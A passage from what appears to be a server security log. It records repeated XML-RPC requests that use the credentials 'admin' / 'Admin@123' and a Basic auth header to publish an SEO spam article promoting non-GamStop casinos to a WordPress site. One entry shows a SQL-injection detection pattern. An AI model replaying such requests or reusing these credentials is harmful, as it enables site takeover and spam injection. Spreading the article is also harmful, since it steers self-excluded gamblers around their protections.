\/xmlrpc.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36\nhost:47.254.126.238\nauthorization:Basic cm9uaTozWmhJIE9jTUMgQ1VreSA0RFV5IEs4MEcgS0RoeQ==\ncontent-type:text\/xml\ncontent-length:14589\naccept-encoding:identity\n\n<?xml version='1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>"]
["2026-05-16 20:36:07","89.222.112.54","POST","\/xmlrpc.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36","post","select.+(from|limit) >> <?xml version:'1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>","POST \/xmlrpc.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36\nhost:47.254.126.238\nauthorization:Basic cm9uaTozWmhJIE9jTUMgQ1VreSA0RFV5IEs4MEcgS0RoeQ==\ncontent-type:text\/xml\ncontent-length:14589\naccept-encoding:identity\n\n<?xml version='1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic 